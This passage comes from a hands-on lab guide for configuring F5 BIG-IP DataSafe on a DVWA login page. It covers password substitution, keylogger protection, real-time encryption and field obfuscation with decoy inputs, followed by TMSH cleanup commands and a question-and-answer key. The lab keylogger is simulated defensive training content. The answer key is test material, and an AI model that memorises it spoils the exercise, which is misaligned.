the Headers tab.

Questions:
Is the password value now safe from malware after submitting the form? _______________

Is the username value now safe from malware after submitting the form? _______________

− In the Configuration Utility, for the password parameter select the Substitute Value checkbox, and then click Save.
− In the DVWA page click Logout, and then enter the credentials victim / P@ssw0rd! but do not click Login.
− Open the Console tab and repeat the following and press Enter (type the ↑ key on your keyboard):
document.forms[0].password.value;

Question:
Is the password value now safe from malware prior to submitting the form? _______________

Task 3 – Use Keylogger Protection


Configure the BIG-IP DataSafe profile to protect passwords that are captured from keylogger programs.

− Click the DVWA bookmark, and then click the Hacking tools bookmark.
− From the hacking tools click Start Keylogger, then for the Password type P@ssw0rd!
− Right-click at the top of the hacking tools widget and select Inspect.

− In the inspection tools examine the Elements tab.

This data has been captured by the keylogger program and can now be viewed by a malicious user.
− In the Configuration Utility, from the left menu open the Application Layer Encryption page and select
the Keylogger Protection checkbox, and then click Save.

− In the DVWA page click the DVWA bookmark, and then click the Hacking tools bookmark.
− From the hacking tools click Start Keylogger, then for the Password type P@ssw0rd!
− Right-click at the top of the hacking tools widget and select Inspect.
− In the inspection tools expand the div id="vToolsconsole" tag.

Question:
Is the password visible within the keylog file? _______________

− Click back into the Password field and examine the Elements tab.
While the cursor is inside the password field, random characters continue to get added to the keylog file.

Task 4 – Use Real-Time Encryption


Configure the BIG-IP DataSafe profile so that passwords are encrypted in real-time as they are typed.

− Click the DVWA bookmark, then right-click inside the Password field and select Inspect.
− While you examine the Elements tab, for the Password type P@ssw0rd!
Encryption is not taking place in real-time, making it vulnerable to malware that grabs passwords as
they are typed.
− In the Configuration Utility select the Advanced > Real-Time Encryption checkbox, and then click Save.
− In the DVWA page click the DVWA bookmark.
− While you examine the Elements tab, for the Password type P@ssw0rd!

The encryption for the password field is now taking place in real-time, as you type.


Task 5 – Enable HTML Field Obfuscation and Decoy Inputs


Configure the BIG-IP DataSafe profile to enable HTML field obfuscation and decoy input fields for the login page.

− Click the DVWA bookmark, then right-click inside the Username field and select Inspect, and then examine
the name value for this input parameter.

You can view the name for this parameter: username. You can also view the name of the password parameter.
This makes it easy for fraudsters to craft malware that targets this web application.
− Right-click the <form action="login.php" method="post"> line and select Edit as HTML.
− Notice that there are three input values within the form tags.

The code within the form is static HTML. There are three parameters, the username and password fields and
the submit button. This static HTML code makes it very easy for fraudsters to develop malware that targets this
web page.
− In the Configuration Utility select the HTML Field Obfuscation checkbox, and then select
the Add Decoy Inputs checkbox.
− Open the Parameters page, then for both the username and password parameters select the Obfuscate checkbox,
and then click Save.
− In the DVWA page click the DVWA bookmark, then right-click inside the Username field and select Inspect, and
then examine the name value for this input parameter.

The name of the username parameter is now obfuscated. In addition, the obfuscated value changes
every few seconds.
− Right-click the <form action="login.php" method="post"> line and select Edit as HTML.
BIG-IP DataSafe adds decoy input fields in the HTML source code.
− Click outside of the form edit panel and examine the contents of the form element.
BIG-IP DataSafe adds and removes decoy input fields in the HTML source code dynamically, making it virtually
impossible for a fraudster to manipulate the form and/or steal data from it.
− Log in as victim / P@ssw0rd!
The successful login shows that the HTML obfuscation works transparently and does not affect the
user experience.
− In the inspection window on the Network tab click login.php, and then view the bottom of the Headers tab.
There are now several parameter names and values, and the fraudster will have no way of targeting
this web page.
− Close the DVWA page.

PREPARE FOR NEXT EXERCISE


− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete security anti-fraud profile dvwa_datasafe_profile
exit

Question and Answer Key


Task 2 – Enable DataSafe Protection
Q: Is the password value now safe from malware prior to submitting the form?
A: No

Q: Is the password value now safe from malware after submitting the form?
A: Yes

Q: Is the username value now safe from malware after submitting the form?
A: Yes

Q: Is the password value now safe from malware prior to submitting the form?
A: Yes

Task 3 – Use Keylogger Protection


Q: Is the password easily visible within the keylog file?
A: No
